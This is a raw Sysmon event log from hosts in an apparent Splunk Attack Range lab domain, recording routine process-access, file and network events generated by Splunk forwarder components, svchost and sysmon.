10341000x8000000000000000104748Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.213{54715871-70DE-60CA-2613-00000000CF01}69846852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104747Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.037{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70DE-60CA-2613-00000000CF01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104746Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.035{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104745Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.035{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104744Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.035{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104743Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.034{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104742Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.034{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-70DE-60CA-2613-00000000CF01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104741Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.034{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70DE-60CA-2613-00000000CF01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104740Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.033{54715871-70DE-60CA-2613-00000000CF01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150307Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:02.377{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C16778AC9A7FE2C20ABDD250C6C5133C,SHA256=5F292418B161A9DFA04D318FAA833D3B832D09F179E7DE1BCBDD70094DE7232D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150306Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:02.299{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CC0A2B6D5D7E2A3E856C4A47656D2AD,SHA256=101FD6A0FE63F7CD78D03625564809DEB5CD1F509BAEB0EBF005A7EA125829A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150305Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:02.299{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04A4C5E3FF200EA5B6E9F7F7F645F619,SHA256=47336FB642E1D41C4295D162FC5AD385203E7CA366D5D54054BD7E5AE6FAF8B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104758Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:03.504{54715871-FD28-60C9-3000-00000000CF01}2448NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150309Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:03.395{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE9F630011B86AE91971E1FD5A61AE76,SHA256=13A5C360F16B391EA46541BE30111CDBAE3BD7FED05CE0B3C93A942B1BF9840E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150308Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.066{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58380-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000104760Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.750{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55401-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104759Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:04.125{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CAD216FB3F1919CCF0E64EC9CA34B8B,SHA256=42CDB2D811FC95C15BE5B61D20B54FC8194F9DE234CCF0057E7AEB7DEB56584D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150318Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.675{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70E0-60CA-120D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150317Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.675{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150316Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.675{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150315Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.675{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150314Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.675{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150313Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.675{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-70E0-60CA-120D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150312Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.675{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70E0-60CA-120D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150311Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.676{39BD8DE3-70E0-60CA-120D-00000000D101}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150310Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:04.459{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2AE272408B051080CEDCC19850134D6,SHA256=4A0E2E598D2C8DDEDBF8E732345CB2375246E3FCF13C85AF3529A76CC1464221,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104763Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:05.533{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FCEA30687790C48C9D78113FEB4C6512,SHA256=9A6BED9D13B71D1CE87CE9679265B64D1266DA742914057E66D5517549C9EF42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104762Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:05.527{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DC838562E92762A524EAB9BA8DFDD06,SHA256=C4F5CE54BE3A836BB3288A4680380E2BE2273AAE5F6CB71D336E28CCD21933C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104761Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:03.178{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55402-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x8000000000000000150339Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.946{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70E1-60CA-140D-00000000D101}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150338Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.943{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150337Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.943{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150336Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.943{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-70E1-60CA-140D-00000000D101}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150335Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:05.943{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150334Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 